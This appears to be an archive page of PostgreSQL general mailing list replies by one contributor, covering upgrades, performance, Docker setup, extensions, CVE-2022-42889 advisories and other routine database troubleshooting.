maxzor  ezt írta (időpont: 2020. febr. 16., V, 22:38):

> Hello,
>
> 1. I was told that M$ SQLServer provides huge performance deltas over
> PostgreSQL when dealing with index-unaligned queries :
> create index i on t (a,b, c);
> select * from t where b=... and c=...;
> Columnar storage has been tried by various companies, CitusData,
> EnterpriseDB, 2ndQuadrant, Fujitsu Enterprise Postgres. It has been
> discussed quite a lot, last thread that I was able to find being in 2017,
> https://www.postgresql.org/message-id/CAJrrPGfaC7WC9NK6PTTy6YN-NN%2BhCy8xOLAh2doYhVg5d6HsAA%40mail.gmail.com
> where Fujitsu's patch made it quite far.
> What is the status on such a storage manager extension interface ?
>
> 2. What do you think of adding a new syntax : 'from t join t2 using
> (fk_constraint)' ? And further graph algorithms to make automatic joins ?
> Both 'natural join' and 'using (column_name)' are useless when the
> columns are not the same in source and destination.
> Plus it is often the case that the fk_constraints are over numerous
> columns, even though this is usually advised against. But when this case
> happens there will be a significant writing speedup.
> I have been bothered by this to the point that I developed a
> graphical-query-builder plugin for pgModeler,
>
> https://github.com/maxzor/plugins/tree/master/graphicalquerybuilder#automatic-join-mode
> ,
> but I believe such a syntax would be much better in the core!
>
> 3. What is the status of making the internal parser of PostgreSQL less
> coupled to the core, and easier to cherry-pick from outside?
> It would be great to incorporate it into companion projects : pgAdmin4,
> pgModeler, pgFormatter...
>
> BR, Maxime Chambonnet
>

Re: easy way to acquire height / width from images (PNG, JPEG) stored as bytea?

2020-04-17 Thread Imre Samu

> it killed my 200+ days uptime FreeBSD box :( .
> As I describe above, those attachments are nowhere as files.
> They are email attachments. Also we got about half TB of them.

it is possible - that  some image is a "decompression bomb" ?

*"Because of the efficient compression method used in Portable Network
Graphics (PNG) files, a small PNG file can expand tremendously, acting as a
"decompression bomb". Malformed PNG chunks can consume a large amount of
CPU and wall-clock time and large amounts of memory, up to all memory
available on a system, causing a Denial of Service (DoS). Libpng-1.4.1 has
been revised to use less CPU time and memory, and provides functions that
applications can use to further defend against such files."*
https://libpng.sourceforge.io/decompression_bombs.html
https://stackoverflow.com/questions/33602308/how-to-check-png-file-if-its-a-decompression-bomb

Regards,
 Imre

Achilleas Mantzios  ezt írta (időpont: 2020.
ápr. 17., P, 16:39):

> On 17/4/20 4:09 μ.μ., Adam Brusselback wrote:
>
> Why not extract and store that metadata with the image rather than trying
> to extract it to filter on at query time? That way you can index your
> height and width columns to speed up that filtering if necessary.
>
> Yes I thought of that, but those are coming automatically from our mail
> server (via synonym), we have written an alias : a program that parses and
> stores emails. This is generic, I wouldn't like to add specific code (or
> specific columns)  just for image attachments. However I dig the idea of
> the indexes.
>
> You may be able to write a wrapper for a command line tool like imagemagic
> or something so you can call that from a function to determine the size if
> you did want to stick with extracting that at query time.
>
> As I describe above, those attachments are nowhere as files. They are
> email attachments. Also we got about half TB of them.
>

Re: TPC-H

2018-07-15 Thread Imre Samu

> Is there a table definition script available that is widely used for
TPC-H in Postgresql to get results that can be compared?

There are multiple "PostgreSQL + TCP-H"  projects on the github -
Maybe you can reuse some ideas ...
https://github.com/search?q=%22TPC-H%22+postgresql&type=Repositories

regards,
Imre


Malte Vesper  ezt írta (időpont: 2018. júl. 15., V,
15:31):

> Hello,
> I am trying to run TPC-H on PostgreSQL. While I was able to create the
> tables and run the queries, I am wondering if there is a table definition
> forTPC-H and PostgreSQL that is generally used, as far as I understand the
> TPC-H user can choose to create indices or preprocess data in individual
> tablesto quite an extent (i.e. CLUSTER seems allowed), leading to
> unexpected/very different results depending on the table definition (i.e.
> https://www.postgresql.org/message-id/CAKJS1f-erAogxxd=4tr2rlukoy5m-or+djyzr2rbmanz35t...@mail.gmail.com
> ).
>
> Is there a table definition script available that is widely used for TPC-H
> in Postgresql to get results that can be compared?
>
> Kind regards,
> Malte Vesper
>
>

Re: Error while upgrading from v12 to v13

2022-10-29 Thread Imre Samu

> ERROR:  could not find function "pl_profiler_enable" in file

maybe obsolete function?

-- Drop obsolete function
DROP FUNCTION pl_profiler_enable(bool);
https://github.com/bigsql/plprofiler/blob/master/plprofiler--3.5--4.0.sql

Regards,
 Imre

shashidhar Reddy  ezt írta (időpont: 2022.
okt. 29., Szo, 13:40):

>
> I am getting below error while upgrading postgres from version 12 to 13
> and not sure how to enable the function before upgrading the cluster. Can
> you please help me to resolve this.
>
>  error: could not execute query: ERROR:  could not find function
> "pl_profiler_enable" in file
> "/usr/lib/postgresql/13/lib/plprofiler.so"
> Command was: CREATE FUNCTION "public"."pl_profiler_enable"("enabled"
> boolean) RETURNS boolean
> LANGUAGE "c"
> AS '$libdir/plprofiler', 'pl_profiler_enable';
> Shashidhar
>

Re: Information to CVE-2022-42889

2022-11-08 Thread Imre Samu

> if the above product is affected by the CVE

You will find the "Known PostgreSQL Security Vulnerabilities in Supported
Versions"
here: https://www.postgresql.org/support/security/

For the PostgreSQL JDBC Driver:
please check https://jdbc.postgresql.org/security/
or the fixed CVE lists:
https://github.com/pgjdbc/pgjdbc/issues?q=CVE+sort%3Aupdated-desc
or https://github.com/pgjdbc/pgjdbc/security/advisories ( Security
Advisories )

Based on
https://www.docker.com/blog/security-advisory-cve-2022-42889-text4shell/
you have to search for the "commons-text-1.9.jar" ( commons-text-*.* )  in
the servers or in the clients ..
The PostgreSQL ecosystem is huge (e.g. a driver, an extension, or an
installer) so you have to check any java related software.

Anyway, it's a good time to install the latest patch version of everything.
( Latest PostgreSQL JDBC Driver ;
  or  Latest  Postgres minor version;  see:
https://www.postgresql.org/support/versioning/ )
The Next minor release is expected on:  *November 10th, 2022 * ( see
https://www.postgresql.org/developer/roadmap/ )
*"The PostgreSQL Project releases security fixes as part of minor version
updates. You are always advised to use the latest minor version available,
as it will contain other non-security related fixes."*

You will find professional services here:
https://www.postgresql.org/support/professional_support/

Regards,
 Imre
 ( Disclaimer: I am just a Postgres user and not a security expert! )


Cedric Aaron Towstyka  ezt írta
(időpont: 2022. nov. 8., K, 12:10):

> Hello dear PostgreSQL Server Team,
>
> the german bureau for IT-Security "BSI" (Bundesamt für Sicherheit in der
> Informationstechnik) has issued a warning for CVE CVE-2022-42889 with the
> name commons-text. Insurance companies are obliged to analyse the
> installed software for vulnerabilities of this type.
> As the Barmenia is using your product PostgreSQL Server it is necessary to
> obtain all information regarding any vulnerability against above CVE.
>
> We kindly ask you to provide information if the above product is affected
> by the CVE and if yes, when a fix will be available.
>
>
>
> With the request for short-term feedback.
>
> Kind Regards.
>
>
>
> Cedric Aaron Towstyka
>
> Databaseadministrator
>
>
>
> Barmenia Krankenversicherung a. G.
>
> Barmenia Allgemeine Versicherungs-AG
>
> Barmenia Lebensversicherung a. G.
>
> Barmenia-Allee 1
>
> 42119 Wuppertal
>
>
>
> +49 202 438 2964
>
>
>
> 
> - facebook.de/barmenia  -
> xing.de/companies/barmenia
>  -
> twitter.com/barmenia - youtube.de/barmenia
> 
>
> Barmenia Allgemeine Versicherungs-AG
> Vorstand: Dr. Andreas Eurich (Vorsitzender) - Frank Lamsfuß - Ulrich Lamy
> - Carola Schroeder
> Aufsichtsrats-Vorsitzender: Dr. h. c. Josef Beutelmann; Rechtsform des
> Unternehmens: Aktiengesellschaft
> Sitz: Wuppertal; Amtsgericht Wuppertal HRB 3033;
> USt.-Identifikationsnummer: DE 811425914; Versicherungsteuernummer:
> 810/V90810006337
>
> Barmenia Krankenversicherung AG
> Vorstand: Dr. Andreas Eurich (Vorsitzender) - Frank Lamsfuß - Ulrich Lamy
> - Carola Schroeder
> Aufsichtsrats-Vorsitzender: Dr. h. c. Josef Beutelmann; Rechtsform des
> Unternehmens: Aktiengesellschaft
> Sitz: Wuppertal; Amtsgericht Wuppertal HRB 28475;
> USt.-Identifikationsnummer: DE 121102508
>
> Barmenia Lebensversicherung a. G.
> Vorstand: Dr. Andreas Eurich (Vorsitzender) - Frank Lamsfuß - Ulrich Lamy
> - Carola Schroeder
> Aufsichtsrats-Vorsitzender: Dr. h. c. Josef Beutelmann; Rechtsform des
> Unternehmens: Versicherungsverein auf Gegenseitigkeit
> Sitz: Wuppertal; Amtsgericht Wuppertal HRB 3854;
> USt.-Identifikationsnummer: DE 121102516
>
>
>

PostgreSQL Mailing list public archives : search not working ...

2023-04-06 Thread Imre Samu

Hi,

Theory: Maybe the search doesn't always work ...
Is this a known problem?

My use case:
in https://www.postgresql.org/list/  ->  "Search the Archives"
search for the "large database backup"
->
https://www.postgresql.org/search/?m=1&q=large+database+backup&l=&d=365&s=r
-> "Your search for large database backup returned no hits."

But at least one big thread exists:

To: pgsql-general 
Subject: postgres *large database backup*
Date: 2022-11-30 15:40:23
https://www.postgresql.org/message-id/flat/CA%2BONtZ7CdiJ2X8x_8sPHR%2Btz-vv7mR1uoDzLia3fzWVZA9k0JQ%40mail.gmail.com


*Changing the "Sort by" ..*

- sort by: rank: no hits
https://www.postgresql.org/search/?m=1&q=large+database+backup&l=&d=365&s=r

- sort by: date:  OK ; 1 result
https://www.postgresql.org/search/?m=1&q=large+database+backup&l=&d=365&s=d

- sort by: reverse date : no hits.
https://www.postgresql.org/search/?m=1&q=large+database+backup&l=&d=365&s=i

Regards,
 Imre

Re: murmur3 hash binary data migration from Oracle to PostgreSQL

2023-04-25 Thread Imre Samu

>
> No we want to generate murmur3 format only.
>

If you need a server-side murmur3 function
-  one alternative is the https://github.com/markokr/pghashlib extension.

psql (15.2 (Debian 15.2-2))
Type "help" for help.

db=# create extension hashlib;
CREATE EXTENSION

db=#
select hash_string('', 'murmur3');
select hash_string('a', 'murmur3');
select hash_string('abcdefg', 'murmur3');
select encode(hash128_string('abcdefg', 'murmur3'), 'hex');
+-+
| hash_string |
+-+
|   0 |
+-+
(1 row)

+-+
| hash_string |
+-+
|  1009084850 |
+-+
(1 row)

+-+
| hash_string |
+-+
| -2009294074 |
+-+
(1 row)

+--+
|  encode  |
+--+
| 069b3c88 |
+--+
(1 row)


In my test, I have used this fork:
https://github.com/bgdevlab/pghashlib/tree/bgdevlab/builds

RUN   mkdir -p /pghashlib \
&& git clone  --depth 1 --branch bgdevlab/builds
https://github.com/bgdevlab/pghashlib.git  /pghashlib \
&& cd /pghashlib \
&& make USE_PGXS=1 \
&& make USE_PGXS=1 install \
&& rm -rf /pghashlib

Regards,
 Imre

Re: running ANALYZE results in => duplicate key value violates unique constraint "pg_statistic_relid_att_inh_index"

2023-09-06 Thread Imre Samu

> But how is that corruption happening - I mean it is a docker image,
> freshly fetched from the registry.

Hi Torsten,

Maybe you have to increase the "*--stop-timeout" value ;   ( or
"*stop_grace_period"
in docker-compose )
https://github.com/docker-library/postgres/issues/544#issuecomment-455738848

*docker run: **" --stop-timeout  Timeout (in seconds) to stop a container "*
https://docs.docker.com/engine/reference/commandline/run/
or
https://docs.docker.com/compose/compose-file/compose-file-v3/#stop_grace_period

And recommended in the Dockerfile:
https://github.com/docker-library/postgres/blob/master/Dockerfile-debian.template#L208









*STOPSIGNAL SIGINT## An additional setting that is recommended for all
users regardless of this# value is the runtime "--stop-timeout" (or your
orchestrator/runtime's# equivalent) for controlling how long to wait
between sending the defined# STOPSIGNAL and sending SIGKILL (which is
likely to cause data corruption).## The default in most runtimes (such as
Docker) is 10 seconds, and the# documentation at
https://www.postgresql.org/docs/12/server-start.html
 notes# that even 90
seconds may not be long enough in many instances.*

regards,
 Imre


Torsten Krah  ezt írta (időpont: 2023. szept. 6., Sze,
14:45):

> Am Mittwoch, dem 06.09.2023 um 10:21 +0200 schrieb Laurenz Albe:
> > You are lucky that the corrupted table is one that holds data that
> > can be rebuilt.
>
> It is a test instance / container anyway which is deleted afterwards
> and can be setup again as often as I want.
>
> But how is that corruption happening - I mean it is a docker image,
> freshly fetched from the registry.
>
> After that I am starting a container from that image, (re)importing
> data (different tests => different data so the cycle of delete data /
> import data / analyze the data happens quite often) and running my
> tests.
> The OS does not report anything which would relate nor does any other
> tool / system fail nor does postgresl itself fail on any other table
> here - it always fails only on that analyze part.
>
> That happens all in about 8-10 minutes for the whole process - what is
> causing that corruption in that short timeframe here?
>
> regards
>
> Torsten
>
>
>
>

Re: Changed functionality from 14.3 to 15.3

2023-09-20 Thread Imre Samu

Michael Corey  ezt írta (időpont: 2023.
szept. 20., Sze, 20:48):

> ... All of the DDL is just the setup for the test case.  I ran those steps
> in both databases to setup the exact same environment.  The COMMIT is not
> needed for the test out of habit I put it in my setup.  The main issue is
> in 14.3 I can run this select as user sten_schema, but in 15.3 I am unable
> due to a permission issue.
>

Hi Michael,

I couldn't reproduce the outcome you observed in PG14.3 using the
"postgres:14.3" (debian) Docker image.

My minimal docker test:

docker pull postgres:14.3
docker run --name pg143tx -e POSTGRES_DB=db14 -e POSTGRES_USER=postgres -e
POSTGRES_PASSWORD=pw9 -d postgres:14.3
docker exec -ti pg143tx psql -d db14 -U postgres

My log:

psql (14.3 (Debian 14.3-1.pgdg110+1))
Type "help" for help.

  < copy paste your test code > 

CREATE ROLE
ERROR:  role "rds_superuser" does not exist
CREATE ROLE
CREATE ROLE
CREATE ROLE
CREATE ROLE
CREATE ROLE
ALTER ROLE
ALTER ROLE
GRANT ROLE
CREATE ROLE
ALTER ROLE
ALTER ROLE
GRANT ROLE
CREATE SCHEMA
ALTER SCHEMA
GRANT
GRANT
GRANT
GRANT
CREATE TABLE
ALTER TABLE
GRANT
GRANT
GRANT
INSERT 0 1
INSERT 0 1
INSERT 0 1
WARNING:  there is no transaction in progress
COMMIT
CREATE SCHEMA
ALTER SCHEMA
GRANT
GRANT
GRANT
GRANT
CREATE VIEW
ALTER TABLE
GRANT
GRANT
db14=# \c db14 sten_schema
You are now connected to database "db14" as user "sten_schema".
db14=> select * from sten_media_codes_view ;
ERROR:  permission denied for table ref_media_code
db14=>  select * from ref_media_code ;
ERROR:  permission denied for table ref_media_code

db14=> SELECT version();
   version

-
 PostgreSQL 14.3 (Debian 14.3-1.pgdg110+1) on x86_64-pc-linux-gnu, compiled
by gcc (Debian 10.2.1-6) 10.2.1 20210110, 64-bit
(1 row)

Regards,
  Imre

Re: Question regarding the new SQL standard

2023-10-26 Thread Imre Samu

Anders Kildemand  ezt írta (időpont: 2023. okt. 26., Cs,
14:38):

> What's the situation with Property Graph Queries in Postgres?
>

If the underlying question is how to utilize graph database functionality
in PostgreSQL, there are similar extensions that may be worth exploring:
- Apache AGE is a PostgreSQL extension that provides graph database
functionality.  https://age.apache.org/
- AgensGraph is a transactional graph database based on PostgreSQL.
https://github.com/bitnine-oss/agensgraph
- etc.

Related : https://www.dylanpaulus.com/posts/postgres-is-a-graph-database/
(  https://news.ycombinator.com/item?id=35386948 )

Best regards,
  Imre

Re: postgresql-10 armhf repository

2018-08-23 Thread Imre Samu

> Is there any other repository with the last version of postgresql-10
armhf packages ?

Postgre Docker images (alpine based)
 -arm32v5:https://hub.docker.com/r/arm32v5/postgres/
- arm32v6:   https://hub.docker.com/r/arm32v6/postgres/   (for Raspberry PI
1 )
- arm32v7:   https://hub.docker.com/r/arm32v7/postgres/   (for Raspberry PI
2, Allwinner A10, A20, H3).
- arm64v8:   https://hub.docker.com/r/arm64v8/postgres/

Imre

Grégoire Berclaz  ezt írta (időpont: 2018.
aug. 23., Cs, 10:43):

> Hello,
>
> I would like to install postgresql-10 on raspberries. I followed this
> instructions : https://wiki.postgresql.org/wiki/Apt
>
> Unfortunatly after a "sudo apt-get update" I get the error :
> " Skipping acquire of configured file 'main/binary-armhf/Packages' as
> repository 'http://apt.postgresql.org/pub/repos/apt stretch-pgdg
> InRelease' doesn't support architecture 'armhf' "
>
> The problem is that there is no armhf directory on the official repository
> https://apt.postgresql.org/pub/repos/apt/dists/stretch-pgdg/main/
>
> So, I have two questions :
>
>- Why postgresql.org doesn't have this package on the repository ?
>- Is there any other repository with the last version of postgresql-10
>armhf packages ?
>
>
> Regards,
> Greg
>

Re: Performance comparison between Pgsql 10.5 and Pgsql 11.2

2019-03-04 Thread Imre Samu

> is there any reason why I am getting worse results using pgsql11.2 in
writing comparing it with pgsql 10.6?
>... And Yes both are compiled.

Why 10.6?

according to release notes
"14th February 2019: PostgreSQL 11.2, 10.7, 9.6.12, 9.5.16, and 9.4.21
Released!"  https://www.postgresql.org/about/news/1920/
imho:* it would be better to compare PG11.2  with  PG10.7  *(  similar bug
Fixes and Improvements + same fsync()  behavior )

*"This release changes the behavior in how PostgreSQL interfaces with
fsync() and includes fixes for partitioning and over 70 other bugs that
were reported over the past three months"*

Imre



Nicola Contu  ezt írta (időpont: 2019. márc. 4., H,
13:14):

> I did a analyze in stages on both.
> And Yes both are compiled.
> This is the configure command (change 10.6 for PG10)
>
> ./configure --prefix=/usr/local/pgsql11.2
>
> See attached perf report. The difference seems to be all in this line, but
> not sure :
>
> +   26.80% 0.00%   222  postmaster   [kernel.kallsyms]
> [k] system_call_fastpath
>
>
>
> I am using CentOS 7
> With Centos I am using this profile for tuned-adm
> [root@STAGING-CMD1 ~]#  tuned-adm active
> Current active profile: latency-performance
>
>
> Il giorno sab 2 mar 2019 alle ore 20:41 Thomas Munro <
> thomas.mu...@gmail.com> ha scritto:
>
>> On Sat, Mar 2, 2019 at 5:02 AM Ray O'Donnell  wrote:
>> > On 01/03/2019 15:01, Nicola Contu wrote:
>> > > Hello,
>> > > is there any reason why I am getting worse results using pgsql11.2 in
>> > > writing comparing it with pgsql 10.6?
>> > >
>> > > I have two Instances, both just restored, so no bloats.
>> > > Running read queries I have pretty much same results, a little bit
>> > > better on pg11- Running writes the difference is in favour of 10.
>> >
>> > Did you run ANALYZE on the databases after restoring?
>>
>> If you can rule out different query plans, and if you compiled them
>> both with the same compiler and optimisation levels and without
>> cassert enabled (it's a long shot but I mentioned that because you
>> showed a path in /usr/local so perhaps you're hand-compiling 11, but
>> 10 came from a package?), then the next step might be to use a
>> profiler like "perf" (or something equivalent on your OS) to figure
>> out where 11 is spending more time in the write test?
>>
>> --
>> Thomas Munro
>> https://enterprisedb.com
>>
>

Re: Postgres Database Hacked

2019-05-08 Thread Imre Samu

> I am working on postgres database version 9.3
> ...and now my running database become hacked by someone.

imho:
The 9.3 version is End of Life (EoL)  ;
Final Release:9.3.25  (November 8, 2018)
https://www.postgresql.org/support/versioning/

Please upgrade for newer versions ( with the latest security fixes )

Best,
Imre


Prashant Hunnure  ezt írta (időpont: 2019.
máj. 8., Sze, 12:50):

> Dear Team,
>
> I am working on postgres database version 9.3 is the part of opengeo suite
> and now my running database become hacked by someone. In the current
> situation I'm able to view my database under Pgadmin III but unable to view
> the tables, functions and other attributes on windows environment.
>
> Your valuable solution / suggestions are highly appreciated.
>
> Thanks and Regards,
> Prashant Hunnure
> Database Architect
> S2 Infotech International Limited,Mumbai.
>
>

38 matches

Mail list logo